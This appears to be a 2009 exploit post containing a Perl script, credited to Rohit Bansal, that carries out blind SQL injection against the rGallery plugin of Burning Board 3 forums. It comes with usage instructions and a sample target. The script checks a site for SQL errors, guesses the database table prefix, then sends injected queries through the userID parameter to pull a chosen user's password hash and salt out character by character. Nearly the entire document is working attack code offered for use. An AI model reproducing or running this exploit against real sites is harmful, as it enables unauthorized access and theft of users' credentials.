wbb3-sql.txt
Posted on 24 March 2009
#!/usr/bin/perl -w use strict; use LWP::Simple; $| = 1; print q { ############################# ## WBB3 Blind SQL-Injector ## #### Exploit in rGallery #### ###### by Rohit Bansal ###### ############################# \ Special greetz to # // # \ www.schap.org # // # ############################# }; if (@ARGV < 3) { print "Usage: wbb3sploit.pl [url] [user id] [User Gallery userID] Example: wbb3sploit.pl www.target.com 1 5 "; print "[User Gallery UserID] has to be the ID of a User, who has got pictures. Example: www.target.com/index.php?page=RGalleryUserGallery&userID=5 "; exit; } my $url = shift; my $uid = shift; my $galid = shift; my $prefix; my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0'); print "~ Is it vulnerable?... "; my $chreq = get("http:// ".$url."/index.php?page=RGalleryUserGallery&userID='"); if (($chreq =~ m/Fatal error/i) || ($chreq =~ m/Invalid SQL/i)) { print "Nice, seems to be vulnerable! "; } else { print "Seems to be patched, sorry "; exit; } print "~ Checking Prefix... "; if ($chreq =~ m/_wcf/i) { print "~ Found Prefix '$1' "; $prefix = $1; } else { print "~ Can't find prefix, using 'wcf1_' "; $prefix = "wcf1_"; } print "~ Exploiting... "; print "~^~ Hash: "; my $counter = 1; my $countersalt = 1; while($counter < 41) { my $false_result = get("http:// ".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/password/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=-1"); foreach(@charset) { my $ascode = ord($_); my $result = get("http:// ".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/password/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=".$ascode.""); if (length($result) != 0) { if ($result =~ "Keine") { } else{ print chr($ascode); $counter++; } } } } my $saltcheck = get("http:// ".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),1))>0"); if($saltcheck =~ "Keine") { } else { print " ~^~ Salt: "; while($countersalt < 40) { my $false_result_salt = get("http:// ".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=-1"); foreach(@charset) { my $ascodesalt = ord($_); my $resultsalt = get("http:// ".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$countersalt."))=".$ascodesalt.""); if (length($resultsalt) != 0) { if ($resultsalt =~ "Keine") { } else{ print chr($ascodesalt); $countersalt++; } } } } } print " ~ Done! Exploit by Rohit Bansal "; Regards Rohit bansal schap team
